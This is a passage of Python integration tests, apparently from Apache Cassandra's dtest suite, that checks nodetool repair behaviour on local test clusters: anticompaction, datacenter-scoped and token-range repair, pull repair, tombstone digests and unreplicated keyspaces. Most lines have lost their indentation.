assert int(num_out_of_sync_ranges) == 1, \
"Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, num_out_of_sync_ranges)
            assert out_of_sync_nodes in valid_out_of_sync_pairs, \
                "Unexpected out-of-sync pair: {}, expected one of {}".format(out_of_sync_nodes, valid_out_of_sync_pairs)
# Check node3 now has the key
self.check_rows_on_node(node3, 2001, found=[1000], restart=False)
class TestRepair(BaseRepairTest):
@since('4.0')
def test_parent_repair_session_cleanup(self):
"""
Calls range_tombstone_digest with a sequential repair and verifies if
all ParentRepairSession objects are cleaned
@jira_ticket CASSANDRA-16446
"""
self._range_tombstone_digest(sequential=True)
assert_parent_repair_session_count(self.cluster.nodes.values(), 0)
@since('2.2.1', max_version='4')
def test_no_anticompaction_after_dclocal_repair(self):
"""
* Launch a four node, two DC cluster
* Start a -local repair on node1 in dc1
* Assert that the dc1 nodes see repair messages
* Assert that the dc2 nodes do not see repair messages
* Assert no nodes anticompact
# TODO: Verify the anticompaction with sstablemetadata, not just logs
@jira_ticket CASSANDRA-10422
"""
cluster = self.cluster
logger.debug("Starting cluster..")
cluster.populate([2, 2]).start()
node1_1, node2_1, node1_2, node2_2 = cluster.nodelist()
node1_1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=4)', '-rate', 'threads=50'])
node1_1.nodetool("repair -local keyspace1 standard1")
assert node1_1.grep_log("Not a global repair")
assert node2_1.grep_log("Not a global repair")
# dc2 should not see these messages:
assert not node1_2.grep_log("Not a global repair")
assert not node2_2.grep_log("Not a global repair")
# and no nodes should do anticompaction:
for node in cluster.nodelist():
assert not node.grep_log("Starting anticompaction")
# @pytest.mark.skipif(CASSANDRA_VERSION_FROM_BUILD == '3.9', reason="Test doesn't run on 3.9")
@pytest.mark.skip_version('3.9')
def test_nonexistent_table_repair(self):
"""
* Check that repairing a non-existent table fails
@jira_ticket CASSANDRA-12279
"""
self.fixture_dtest_setup.ignore_log_patterns = [r'Unknown keyspace/cf pair']
cluster = self.cluster
logger.debug('Starting nodes')
cluster.populate(2).start()
node1, _ = cluster.nodelist()
logger.debug('Creating keyspace and tables')
node1.stress(stress_options=['write', 'n=1', 'no-warmup',
'cl=ONE', '-schema', 'replication(factor=2)',
'-rate', 'threads=1'])
logger.debug('Repairing non-existent table')
def repair_non_existent_table():
global nodetool_error
try:
node1.nodetool('repair keyspace1 standard2')
except Exception as e:
nodetool_error = e
        # Launch in an external thread so it does not hang the process
t = Thread(target=repair_non_existent_table)
t.start()
t.join(timeout=60)
assert not t.is_alive(), 'Repair thread on inexistent table is still running'
if self.cluster.version() >= '2.2':
node1.watch_log_for("Unknown keyspace/cf pair", timeout=60)
# Repair only finishes with error status after CASSANDRA-12508 on 3.0+
if self.cluster.version() >= '3.0':
assert 'nodetool_error' in globals() and isinstance(nodetool_error, ToolError), \
'Repair thread on inexistent table did not throw exception'
logger.debug(repr(nodetool_error))
assert 'Unknown keyspace/cf pair' in repr(nodetool_error),\
'Repair thread on inexistent table did not detect inexistent table.'
@since('2.2.1', max_version='4')
def test_no_anticompaction_after_hostspecific_repair(self):
"""
* Launch a four node, two DC cluster
* Start a repair on all nodes, by enumerating with -hosts
* Assert all nodes see a repair messages
* Assert no nodes anticompact
# TODO: Verify the anticompaction with sstablemetadata, not just logs
@jira_ticket CASSANDRA-10422
"""
cluster = self.cluster
logger.debug("Starting cluster..")
cluster.populate([2, 2]).start()
node1_1, node2_1, node1_2, node2_2 = cluster.nodelist()
node1_1.stress(stress_options=['write', 'n=100K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=4)', '-rate', 'threads=50'])
node1_1.nodetool("repair -hosts 127.0.0.1,127.0.0.2,127.0.0.3,127.0.0.4 keyspace1 standard1")
for node in cluster.nodelist():
assert node.grep_log("Not a global repair")
for node in cluster.nodelist():
assert not node.grep_log("Starting anticompaction")
@since('2.2.4', max_version='4')
def test_no_anticompaction_after_subrange_repair(self):
"""
* Launch a three node, two DC cluster
* Start a repair on a token range
* Assert all nodes see repair messages
* Assert no nodes anticompact
# TODO: Verify the anticompaction with sstablemetadata, not just logs
@jira_ticket CASSANDRA-10422
"""
cluster = self.cluster
logger.debug("Starting cluster..")
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
node1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)', '-rate', 'threads=50'])
node1.nodetool("repair -st 0 -et 1000 keyspace1 standard1")
for node in cluster.nodelist():
assert node.grep_log("Not a global repair")
for node in cluster.nodelist():
assert not node.grep_log("Starting anticompaction")
def _get_repaired_data(self, node, keyspace):
"""
Based on incremental_repair_test.py:TestIncRepair implementation.
"""
_sstable_name = re.compile('SSTable: (.+)')
_repaired_at = re.compile(r'Repaired at: (\d+)')
_sstable_data = namedtuple('_sstabledata', ('name', 'repaired'))
out = node.run_sstablemetadata(keyspace=keyspace).stdout
def matches(pattern):
return [_f for _f in [pattern.match(l) for l in out.split('\n')] if _f]
names = [m.group(1) for m in matches(_sstable_name)]
repaired_times = [int(m.group(1)) for m in matches(_repaired_at)]
assert names
assert repaired_times
return [_sstable_data(*a) for a in zip(names, repaired_times)]
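    # Illustrative result: [_sstabledata(name='.../na-1-big-Data.db', repaired=1631234567890), ...]
    # where repaired == 0 means the sstable is unrepaired.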
@since('2.2.10', max_version='4')
def test_no_anticompaction_of_already_repaired(self):
"""
* Launch three node cluster and stress with RF2
* Do incremental repair to have all sstables flagged as repaired
* Stop node2, stress, start again and run full -pr repair
* Verify that none of the already repaired sstables have been anti-compacted again
@jira_ticket CASSANDRA-13153
"""
cluster = self.cluster
logger.debug("Starting cluster..")
# disable JBOD conf since the test expects sstables to be on the same disk
cluster.set_datadir_count(1)
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
# we use RF to make sure to cover only a set of sub-ranges when doing -full -pr
node1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=50'])
# disable compaction to make sure that we won't create any new sstables with repairedAt 0
node1.nodetool('disableautocompaction keyspace1 standard1')
        # Do incremental repair of all ranges. All sstables are expected to have repairedAt set afterwards.
node1.nodetool("repair keyspace1 standard1")
meta = self._get_repaired_data(node1, 'keyspace1')
repaired = set([m for m in meta if m.repaired > 0])
assert len(repaired) == len(meta)
# stop node2, stress and start full repair to find out how synced ranges affect repairedAt values
node2.stop(wait_other_notice=True)
node1.stress(stress_options=['write', 'n=40K', 'no-warmup', 'cl=ONE', '-rate', 'threads=50'])
node2.start(wait_for_binary_proto=True)
node1.nodetool("repair -full -pr keyspace1 standard1")
meta = self._get_repaired_data(node1, 'keyspace1')
repairedAfterFull = set([m for m in meta if m.repaired > 0])
# already repaired sstables must remain untouched
assert repaired.intersection(repairedAfterFull) == repaired
@since('2.2.1', '4')
def test_anticompaction_after_normal_repair(self):
"""
* Launch a four node, two DC cluster
* Start a normal repair
* Assert every node anticompacts
@jira_ticket CASSANDRA-10422
"""
cluster = self.cluster
logger.debug("Starting cluster..")
cluster.populate([2, 2]).start()
node1_1, node2_1, node1_2, node2_2 = cluster.nodelist()
node1_1.stress(stress_options=['write', 'n=50K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=4)'])
node1_1.nodetool("repair keyspace1 standard1")
for node in cluster.nodelist():
assert "Starting anticompaction"
def test_simple_sequential_repair(self):
"""
Calls simple repair test with a sequential repair
"""
self._simple_repair(sequential=True)
def test_simple_parallel_repair(self):
"""
Calls simple repair test with a parallel repair
"""
self._simple_repair(sequential=False)
def test_empty_vs_gcable_sequential_repair(self):
"""
Calls empty_vs_gcable repair test with a sequential repair
"""
self._empty_vs_gcable_no_repair(sequential=True)
def test_empty_vs_gcable_parallel_repair(self):
"""
Calls empty_vs_gcable repair test with a parallel repair
"""
self._empty_vs_gcable_no_repair(sequential=False)
def test_range_tombstone_digest_sequential_repair(self):
"""
Calls range_tombstone_digest with a sequential repair
"""
self._range_tombstone_digest(sequential=True)
def test_range_tombstone_digest_parallel_repair(self):
"""
Calls range_tombstone_digest with a parallel repair
"""
self._range_tombstone_digest(sequential=False)
@since('2.1')
def test_shadowed_cell_digest_sequential_repair(self):
"""
Calls _cell_shadowed_by_range_tombstone with sequential repair
"""
self._cell_shadowed_by_range_tombstone(sequential=True)
@since('2.1')
def test_shadowed_cell_digest_parallel_repair(self):
"""
Calls _cell_shadowed_by_range_tombstone with parallel repair
"""
self._cell_shadowed_by_range_tombstone(sequential=False)
@since('3.0')
def test_shadowed_range_tombstone_digest_sequential_repair(self):
"""
Calls _range_tombstone_shadowed_by_range_tombstone with sequential repair
"""
self._range_tombstone_shadowed_by_range_tombstone(sequential=True)
@since('3.0')
def test_shadowed_range_tombstone_digest_parallel_repair(self):
"""
Calls _range_tombstone_shadowed_by_range_tombstone with parallel repair
"""
self._range_tombstone_shadowed_by_range_tombstone(sequential=False)
@pytest.mark.no_vnodes
def test_simple_repair_order_preserving(self):
"""
Calls simple repair test with OPP and sequential repair
@jira_ticket CASSANDRA-5220
"""
self._simple_repair(order_preserving_partitioner=True)
def _simple_repair(self, order_preserving_partitioner=False, sequential=True):
"""
* Configure a three node cluster to not use hinted handoff, and to use batch commitlog
* Launch the cluster
* Create a keyspace at RF 3 and table
* Insert one thousand rows at CL ALL
* Flush on node3 and shut it down
* Insert one row at CL TWO
* Restart node3
* Insert one thousand more rows at CL ALL
* Flush all nodes
* Check node3 only has 2000 keys
* Check node1 and node2 have 2001 keys
* Perform the repair type specified by the parent test
* Assert the appropriate messages are logged
* Assert node3 now has all data
@jira_ticket CASSANDRA-4373
"""
if order_preserving_partitioner:
self.cluster.set_partitioner('org.apache.cassandra.dht.ByteOrderedPartitioner')
self._populate_cluster()
self._repair_and_verify(sequential)
def _empty_vs_gcable_no_repair(self, sequential):
"""
Repairing empty partition and tombstoned partition older than gc grace
should be treated as the same and no repair is necessary.
@jira_ticket CASSANDRA-8979.
"""
cluster = self.cluster
cluster.populate(2)
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
# create keyspace with RF=2 to be able to be repaired
create_ks(session, 'ks', 2)
        # We create two tables: cf1 has a low gc_grace_seconds so that its data
        # becomes gc-able during the test (we don't actually drop it), while cf2
        # keeps the default gc_grace_seconds.
        # Compaction is disabled so that data is not purged.
query = """
CREATE TABLE cf1 (
key text,
c1 text,
c2 text,
PRIMARY KEY (key, c1)
)
WITH gc_grace_seconds=1
AND compaction = {'class': 'SizeTieredCompactionStrategy', 'enabled': 'false'};
"""
session.execute(query)
time.sleep(.5)
query = """
CREATE TABLE cf2 (
key text,
c1 text,
c2 text,
PRIMARY KEY (key, c1)
)
WITH compaction = {'class': 'SizeTieredCompactionStrategy', 'enabled': 'false'};
"""
session.execute(query)
time.sleep(.5)
# take down node2, so that only node1 has gc-able data
node2.stop(wait_other_notice=True)
for cf in ['cf1', 'cf2']:
# insert some data
for i in range(0, 10):
for j in range(0, 1000):
query = SimpleStatement("INSERT INTO {} (key, c1, c2) VALUES ('k{}', 'v{}', 'value')".format(cf, i, j), consistency_level=ConsistencyLevel.ONE)
session.execute(query)
node1.flush()
# delete those data, half with row tombstone, and the rest with cell range tombstones
for i in range(0, 5):
query = SimpleStatement("DELETE FROM {} WHERE key='k{}'".format(cf, i), consistency_level=ConsistencyLevel.ONE)
session.execute(query)
node1.flush()
for i in range(5, 10):
for j in range(0, 1000):
query = SimpleStatement("DELETE FROM {} WHERE key='k{}' AND c1='v{}'".format(cf, i, j), consistency_level=ConsistencyLevel.ONE)
session.execute(query)
node1.flush()
# sleep until gc grace seconds pass so that cf1 can be dropped
time.sleep(2)
# bring up node2 and repair
node2.start(wait_for_binary_proto=True)
node2.repair(_repair_options(self.cluster.version(), ks='ks', sequential=sequential))
# check no rows will be returned
for cf in ['cf1', 'cf2']:
for i in range(0, 10):
query = SimpleStatement("SELECT c1, c2 FROM {} WHERE key='k{}'".format(cf, i), consistency_level=ConsistencyLevel.ALL)
res = list(session.execute(query))
assert len([x for x in res if len(x) != 0]) == 0, res
        # Check the log to verify that no repair happened for the gc-able data (cf1)
out_of_sync_logs = node2.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync for cf1".format(cluster.address_regex(), cluster.address_regex()))
assert len(out_of_sync_logs) == 0, "GC-able data does not need to be repaired with empty data: " + str([elt[0] for elt in out_of_sync_logs])
        # Check the log to verify that the non-gc-able data (cf2) was actually repaired
out_of_sync_logs = node2.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync for cf2".format(cluster.address_regex(), cluster.address_regex()))
assert len(out_of_sync_logs) > 0, "Non GC-able data should be repaired"
def _range_tombstone_digest(self, sequential):
"""
        Multiple range tombstones for the same partition and interval must not create a digest mismatch as long
        as the most recent tombstone is present.
        @jira_ticket CASSANDRA-11349.
"""
def withsession(session, node1):
session.execute("delete from table1 where c1 = 'a' and c2 = 'b'")
node1.flush()
# recreate same tombstone (will be flushed by repair, so we end up with 2x on node1 and 1x on node2)
session.execute("delete from table1 where c1 = 'a' and c2 = 'b'")
self._repair_digest(sequential, withsession)
def _cell_shadowed_by_range_tombstone(self, sequential):
"""
        Cells shadowed by range tombstones must not affect repairs (given the tombstones are present on all nodes)
@jira_ticket CASSANDRA-11349.
"""
def withSession(session, node1):
session.execute("INSERT INTO table1 (c1, c2, c3, c4) VALUES ('a', 'b', 'c', 1)")
node1.flush()
session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b'")
self._repair_digest(sequential, withSession)
def _range_tombstone_shadowed_by_range_tombstone(self, sequential):
"""
        Range tombstones shadowed by other range tombstones must not affect repairs
@jira_ticket CASSANDRA-11349.
"""
def withSession(session, node1):
session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b' AND c3 = 'c'")
node1.flush()
session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b'")
node1.flush()
session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b' AND c3 = 'd'")
node1.flush()
session.execute("DELETE FROM table1 WHERE c1 = 'a' AND c2 = 'b' AND c3 = 'a'")
self._repair_digest(sequential, withSession)
def _repair_digest(self, sequential, populate):
cluster = self.cluster
cluster.populate(2)
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
cluster.start()
node1, node2 = cluster.nodelist()
session = self.patient_cql_connection(node1)
# create keyspace with RF=2 to be able to be repaired
create_ks(session, 'ks', 2)
query = """
CREATE TABLE IF NOT EXISTS table1 (
c1 text,
c2 text,
c3 text,
c4 float,
PRIMARY KEY (c1, c2, c3)
)
WITH compaction = {'class': 'SizeTieredCompactionStrategy', 'enabled': 'false'};
"""
session.execute(query)
populate(session, node1)
node2.repair(_repair_options(self.cluster.version(), ks='ks', sequential=sequential))
        # Check the log to verify that no digest mismatch (and hence no repair) occurred for table1
out_of_sync_logs = node2.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync for table1".format(cluster.address_regex(), cluster.address_regex()))
assert len(out_of_sync_logs) == 0, "Digest mismatch for range tombstone: {}".format(str([elt[0] for elt in out_of_sync_logs]))
def test_local_dc_repair(self):
"""
* Set up a multi DC cluster
* Perform a -local repair on one DC
* Assert only nodes in that DC are repaired
"""
cluster = self._setup_multi_dc()
node1 = cluster.nodes["node1"]
node2 = cluster.nodes["node2"]
logger.debug("starting repair...")
opts = ["-local"]
opts += _repair_options(self.cluster.version(), ks="ks")
node1.repair(opts)
# Verify that only nodes in dc1 are involved in repair
out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex()))
assert len(out_of_sync_logs) == 1, "Lines matching: {}".format(len(out_of_sync_logs))
line, m = out_of_sync_logs[0]
num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)}
assert int(num_out_of_sync_ranges) == 1, "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, num_out_of_sync_ranges)
valid_out_of_sync_pairs = {node1.address(), node2.address()}
assert out_of_sync_nodes == valid_out_of_sync_pairs, "Unrelated node found in local repair: {}, expected {}".format(out_of_sync_nodes, valid_out_of_sync_pairs)
# Check node2 now has the key
self.check_rows_on_node(node2, 2001, found=[1000], restart=False)
def test_dc_repair(self):
"""
* Set up a multi DC cluster
* Perform a -dc repair on two dc's
* Assert only nodes on those dcs were repaired
"""
cluster = self._setup_multi_dc()
node1 = cluster.nodes["node1"]
node2 = cluster.nodes["node2"]
node3 = cluster.nodes["node3"]
logger.debug("starting repair...")
opts = ["-dc", "dc1", "-dc", "dc2"]
opts += _repair_options(self.cluster.version(), ks="ks")
node1.repair(opts)
# Verify that only nodes in dc1 and dc2 are involved in repair
out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex()))
assert len(out_of_sync_logs) == 2, "Lines matching: " + str([elt[0] for elt in out_of_sync_logs])
valid_out_of_sync_pairs = [{node1.address(), node2.address()},
{node2.address(), node3.address()}]
for line, m in out_of_sync_logs:
num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)}
assert int(num_out_of_sync_ranges) == 1, "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, num_out_of_sync_ranges)
            assert out_of_sync_nodes in valid_out_of_sync_pairs, \
                "Unexpected out-of-sync pair: {}, expected one of {}".format(out_of_sync_nodes, valid_out_of_sync_pairs)
# Check node2 now has the key
self.check_rows_on_node(node2, 2001, found=[1000], restart=False)
def test_dc_parallel_repair(self):
"""
* Set up a multi DC cluster
* Perform a -dc repair on two dc's, with -dcpar
* Assert only nodes on those dcs were repaired
"""
cluster = self._setup_multi_dc()
node1 = cluster.nodes["node1"]
node2 = cluster.nodes["node2"]
node3 = cluster.nodes["node3"]
logger.debug("starting repair...")
opts = ["-dc", "dc1", "-dc", "dc2", "-dcpar"]
opts += _repair_options(self.cluster.version(), ks="ks", sequential=False)
node1.repair(opts)
# Verify that only nodes in dc1 and dc2 are involved in repair
out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex()))
assert len(out_of_sync_logs) == 2, "Lines matching: " + str([elt[0] for elt in out_of_sync_logs])
valid_out_of_sync_pairs = [{node1.address(), node2.address()},
{node2.address(), node3.address()}]
for line, m in out_of_sync_logs:
num_out_of_sync_ranges, out_of_sync_nodes = m.group(3), {m.group(1), m.group(2)}
assert int(num_out_of_sync_ranges) == 1, "Expecting 1 range out of sync for {}, but saw {}".format(out_of_sync_nodes, num_out_of_sync_ranges)
            assert out_of_sync_nodes in valid_out_of_sync_pairs, \
                "Unexpected out-of-sync pair: {}, expected one of {}".format(out_of_sync_nodes, valid_out_of_sync_pairs)
# Check node2 now has the key
self.check_rows_on_node(node2, 2001, found=[1000], restart=False)
# Check the repair was a dc parallel repair
if self.cluster.version() >= '2.2':
assert len(node1.grep_log('parallelism: dc_parallel')) == 1, str(node1.grep_log('parallelism'))
else:
assert len(node1.grep_log('parallelism=PARALLEL')) == 1, str(node1.grep_log('parallelism'))
def _setup_multi_dc(self):
"""
Sets up 3 DCs (2 nodes in 'dc1', and one each in 'dc2' and 'dc3').
After set up, node2 in dc1 lacks some data and needs to be repaired.
"""
cluster = self.cluster
# Disable hinted handoff and set batch commit log so this doesn't
        # interfere with the test (this must be after the populate)
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
logger.debug("Starting cluster..")
# populate 2 nodes in dc1, and one node each in dc2 and dc3
cluster.populate([2, 1, 1]).start()
node1, node2, node3, node4 = cluster.nodelist()
session = self.patient_cql_connection(node1)
session.execute("CREATE KEYSPACE ks WITH replication = {'class': 'NetworkTopologyStrategy', 'dc1': 2, 'dc2': 1, 'dc3':1}")
session.execute("USE ks")
if cluster.version() < '4.0':
create_cf(session, 'cf', read_repair=0.0, columns={'c1': 'text', 'c2': 'text'})
else:
create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'})
# Insert 1000 keys, kill node 2, insert 1 key, restart node 2, insert 1000 more keys
logger.debug("Inserting data...")
insert_c1c2(session, n=1000, consistency=ConsistencyLevel.ALL, ks='ks')
node2.flush()
node2.stop(wait_other_notice=True)
insert_c1c2(session, keys=(1000, ), consistency=ConsistencyLevel.THREE, ks='ks')
node2.start(wait_for_binary_proto=True)
node1.watch_log_for_alive(node2)
insert_c1c2(session, keys=list(range(1001, 2001)), consistency=ConsistencyLevel.ALL, ks='ks')
cluster.flush()
# Verify that only node2 has only 2000 keys and others have 2001 keys
logger.debug("Checking data...")
self.check_rows_on_node(node2, 2000, missings=[1000])
for node in [node1, node3, node4]:
self.check_rows_on_node(node, 2001, found=[1000])
return cluster
@since('2.2')
    def test_parallel_table_repair_noleak(self):
"""
@jira_ticket CASSANDRA-11215
        Tests that multiple parallel repairs on the same table do not
        cause reference leaks.
"""
self.fixture_dtest_setup.ignore_log_patterns = [
"Cannot start multiple repair sessions over the same sstables", # The message we are expecting
"Validation failed in", # Expecting validation to fail
"RMI Runtime", # JMX Repair failures
"Session completed with the following error", # The nodetool repair error
"ValidationExecutor", # Errors by the validation executor
"RepairJobTask" # Errors by the repair job task
]
cluster = self.cluster
logger.debug("Starting cluster..")
cluster.populate([3]).start()
node1, node2, node3 = cluster.nodelist()
node1.stress(stress_options=['write', 'n=10k', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=3)', '-rate', 'threads=50'])
# Start multiple repairs in parallel
threads = []
for i in range(3):
t = threading.Thread(target=node1.nodetool, args=("repair keyspace1 standard1",))
threads.append(t)
t.start()
# Wait for the repairs to finish
for t in threads:
t.join()
found_message = False
# All nodes should reject multiple repairs and have no reference leaks
for node in cluster.nodelist():
if len(node.grep_log("Cannot start multiple repair sessions over the same sstables")) > 0:
found_message = True
break
assert found_message
@pytest.mark.no_vnodes
def test_token_range_repair(self):
"""
Test repair using the -st and -et options
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on a range that only belongs to node1
* Verify that nodes 1 and 2, and only nodes 1+2, are repaired
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
logger.debug("Starting cluster..")
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
self._parameterized_range_repair(repair_opts=['-st', str(node3.initial_token), '-et', str(node1.initial_token)])
@pytest.mark.no_vnodes
def test_token_range_repair_with_cf(self):
"""
@jira_ticket CASSANDRA-11866
Test repair using the -st and -et, and -cf options
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on a range that only belongs to node1 on the wrong cf
* Verify that the data did not get repaired
* Issue a repair on a range that belongs to the right cf
* Verify that the data was repaired
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
logger.debug("Starting cluster..")
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
# Insert data, kill node 2, insert more data, restart node 2, insert another set of data
logger.debug("Inserting data...")
node1.stress(['write', 'n=1k', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30'])
node2.flush()
node2.stop(wait_other_notice=True)
node1.stress(['write', 'n=1K', 'no-warmup', 'cl=ONE', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=20..40K'])
node2.start(wait_for_binary_proto=True)
node1.stress(['write', 'n=1K', 'no-warmup', 'cl=ALL', '-schema', 'replication(factor=2)', '-rate', 'threads=30', '-pop', 'seq=40..60K'])
cluster.flush()
# Repair only the range node 1 owns on the wrong CF, assert everything is still broken
opts = ['-st', str(node3.initial_token), '-et', str(node1.initial_token), ]
opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='counter1', sequential=False)
node1.repair(opts)
assert len(node1.grep_log('are consistent for standard1')) == 0, "Nodes 1 and 2 should not be consistent."
assert len(node3.grep_log('Repair command')) == 0, "Node 3 should not have been involved in the repair."
out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex()))
assert len(out_of_sync_logs) == 0, "We repaired the wrong CF, so the data should still be out of sync"
# Repair only the range node 1 owns on the right CF, assert everything is fixed
opts = ['-st', str(node3.initial_token), '-et', str(node1.initial_token), ]
opts += _repair_options(self.cluster.version(), ks='keyspace1', cf='standard1', sequential=False)
node1.repair(opts)
assert len(node1.grep_log('are consistent for standard1')) == 0, "Nodes 1 and 2 should not be consistent."
assert len(node3.grep_log('Repair command')) == 0, "Node 3 should not have been involved in the repair."
out_of_sync_logs = node1.grep_log(r"{} and {} have ([0-9]+) range\(s\) out of sync".format(cluster.address_regex(), cluster.address_regex()))
_, matches = out_of_sync_logs[0]
out_of_sync_nodes = {matches.group(1), matches.group(2)}
valid_out_of_sync_pairs = [{node1.address(), node2.address()}]
assert out_of_sync_nodes in valid_out_of_sync_pairs, str(out_of_sync_nodes)
@pytest.mark.no_vnodes
def test_partitioner_range_repair(self):
"""
Test repair using the -pr option
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a repair on a range that only belongs to node1
* Verify that nodes 1 and 2, and only nodes 1+2, are repaired
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
logger.debug("Starting cluster..")
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
self._parameterized_range_repair(repair_opts=['-pr'])
@since('3.10')
@pytest.mark.no_vnodes
def test_pull_repair(self):
"""
Test repair using the --pull option
@jira_ticket CASSANDRA-9876
* Launch a three node cluster
* Insert some data at RF 2
* Shut down node2, insert more data, restore node2
* Issue a pull repair on a range that only belongs to node1
* Verify that nodes 1 and 2, and only nodes 1+2, are repaired
* Verify that node1 only received data
* Verify that node2 only sent data
"""
cluster = self.cluster
cluster.set_configuration_options(values={'hinted_handoff_enabled': False})
cluster.set_batch_commitlog(enabled=True)
logger.debug("Starting cluster..")
cluster.populate(3).start()
node1, node2, node3 = cluster.nodelist()
node1_address = node1.network_interfaces['binary'][0]
node2_address = node2.network_interfaces['binary'][0]
self._parameterized_range_repair(repair_opts=['--pull', '--in-hosts', node1_address + ',' + node2_address, '-st', str(node3.initial_token), '-et', str(node1.initial_token)])
# Node 1 should only receive files (as we ran a pull repair on node1)
assert len(node1.grep_log("Receiving [1-9][0-9]* files")) > 0
assert len(node1.grep_log("sending [1-9][0-9]* files")) == 0
assert len(node1.grep_log("sending 0 files")) > 0
# Node 2 should only send files (as we ran a pull repair on node1)
assert len(node2.grep_log("Receiving [1-9][0-9]* files")) == 0
assert len(node2.grep_log("Receiving 0 files")) > 0
assert len(node2.grep_log("sending [1-9][0-9]* files")) > 0
@since('4.0')
def test_non_replicated_ks_repair(self):
cluster = self.cluster
cluster.populate([2, 2]).start(wait_for_binary_proto=True)
self.fixture_dtest_setup.ignore_log_patterns.extend(["no neighbors to repair with",
"keyspace is skipped since repair was called with --skip-empty"])
_, _, node, _ = cluster.nodelist()
session = self.patient_cql_connection(node)
create_ks(session, "repair1", {'dc1': 2, 'dc2': 0})
create_ks(session, "repair2", {'dc1': 2, 'dc2': 2})
session.execute("create table repair1.t1 (id int primary key, i int)")
session.cluster.control_connection.wait_for_schema_agreement(wait_time=120)
session.execute("create table repair2.t2 (id int primary key, i int)")
session.cluster.control_connection.wait_for_schema_agreement(wait_time=120)
session.execute("insert into repair1.t1 (id, i) values (1, 1)")
session.execute("insert into repair2.t2 (id, i) values (2, 2)")
node.nodetool("repair --ignore-unreplicated-keyspaces -st 0 -et 1")
assert len(node.grep_log("t2 is fully synced")) > 0
assert len(node.grep_log("in repair1 - unreplicated keyspace is ignored since repair was called with --ignore-unreplicated-keyspaces")) > 0
try:
self.fixture_dtest_setup.ignore_log_patterns.append("Nothing to repair for .+ in repair1")
node.nodetool("repair -st 0 -et 1")
assert False, "repair should fail"
except ToolError:
logger.debug("got expected exception during repair")
@since('4.0')
@pytest.mark.no_vnodes
def test_multiple_ranges_repair(self):
cluster = self.cluster
cluster.populate([3])
node1, node2, node3 = cluster.nodelist()
cluster.start(wait_for_binary_proto=True)
self.fixture_dtest_setup.ignore_log_patterns.extend(["Nothing to repair for"])
session = self.patient_cql_connection(node1)
create_ks(session, "repair1", {'dc1': 2})
session.execute("create table repair1.t1 (id int primary key, i int)")
session.cluster.control_connection.wait_for_schema_agreement(wait_time=120)
session.execute("insert into repair1.t1 (id, i) values (1, 1)")
with JolokiaAgent(node1) as jmx:
repair_mbean = make_mbean('db', 'StorageService')
# 0,1 is replicated, -3074457345618258606:-3074457345618258605 is not:
jmx.execute_method(repair_mbean, 'repairAsync(java.lang.String,java.util.Map)',
["repair1", {"ranges": "0:1,-3074457345618258606:-3074457345618258605"}])
node1.watch_log_for("Nothing to repair for \(-3074457345618258606,-3074457345618258605\] in repair1 - aborting")
assert len(node1.grep_log("fully synced")) == 0
jmx.execute_method(repair_mbean, 'repairAsync(java.lang.String,java.util.Map)',
["repair1", {"ranges": "0:1,-3074457345618258606:-3074457345618258605",
"ignoreUnreplicatedKeyspaces": "true"}])
node1.watch_log_for("Found no neighbors for range \(-3074457345618258606,-3074457345618258605\] for repair1 - ignoring since repairing with --ignore-unreplicated-keyspaces")
node1.watch_log_for("t1 is fully synced")
def _parameterized_range_repair(self, repair_opts):
"""
@param repair_opts A list of strings which represent cli args to nodetool repair
* Launch a three node cluster
